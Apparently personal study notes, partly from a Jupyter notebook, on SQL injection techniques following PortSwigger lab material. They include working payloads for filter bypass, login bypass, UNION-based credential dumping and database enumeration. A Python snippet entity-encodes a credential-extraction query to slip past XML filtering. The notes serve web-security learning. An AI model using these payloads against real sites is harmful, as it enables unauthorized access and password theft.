#### Commenting

insecure-website.com/products?category=Gifts
- lets say its sending a query 'SELECT ALL products WHERE category = 'gifts' AND released = 1
- where its showing gift products that ARE released (unreleased would have released = 0)
    SQLI
        insecure-website.com/products?category=Gifts'--
        '-- is a comment so the SQL query is  'SELECT ALL products WHERE category = 'gifts'
        the AND statement is canceled and you see all products

        insecure-website.com/products?category=Gifts'+OR+1=1--
        you are returning all product where either category = gifts OR 1=1, so you return all products

user-login - if there is a un/pw queried and the query is return signals successful login:
    SQLi 
        send in username=administer'--
        SELECT * FROM users WHERE username = 'administrator'--' AND password = ''

#### UNION other tables

union other tables
    if a query is returning product details from a table:
        SELECT name, description FROM products WHERE category = 'Gifts'
    ' UNION SELECT username, password FROM users--
        will return un/pw along with product descriptions

#### Blind injections

if the application doesnt return results of hte query or info about errors in responses, we're blind
    we might be able to detect differences in the response still by
        -new condition for Bool logic, or error with 1/0

#### Second order or stored SQLi

- First order - when app processes user input from HTTP request and incorporates into SQL query in unsafe way
- Second order - when app takes user input from HTTP request and stores for future - put into database
    - when its retrieved later and incorparated into query, then it's second order

#### Examining Database

    SELECT * FROM v$version 
- on oracle - see version details

    SELECT * FROM information_schema.tables
- list tables

#### Finding the number of columns in tables

- if you have XML/JSON/URL, you have first check 1+1 to see if it evaluates to 2, if yes, SQL
- if you have an idea of the other table you are querying from:
- have the original query + UNION SELECT NULL - if this gives a valid return, but NULL, NULL does not, the table you are selecting from only has 1 column
- if UNION SELECT NULL, NULL gives an expected value, but the others dont, table has 2 columns
- XML may scrub the query, so you can encode as hex/dec with the code below
> be careful with ' vs " in the variable titles - ' worked for us

In [62]:
def ch_hex(ch):
    return '&#x{:X};'.format(ord(ch))

def ch_dec(ch):
    return '&#{};'.format(ord(ch))

In [71]:
query = "1 UNION SELECT username || '~' || password FROM users"
enc_query = []
for x in query:
    enc_query.append(ch_dec(x))
print(''.join(enc_query))

&#49;&#32;&#85;&#78;&#73;&#79;&#78;&#32;&#83;&#69;&#76;&#69;&#67;&#84;&#32;&#117;&#115;&#101;&#114;&#110;&#97;&#109;&#101;&#32;&#124;&#124;&#32;&#39;&#126;&#39;&#32;&#124;&#124;&#32;&#112;&#97;&#115;&#115;&#119;&#111;&#114;&#100;&#32;&#70;&#82;&#79;&#77;&#32;&#117;&#115;&#101;&#114;&#115;

https://portswigger.net/web-security/sql-injection/examining-the-database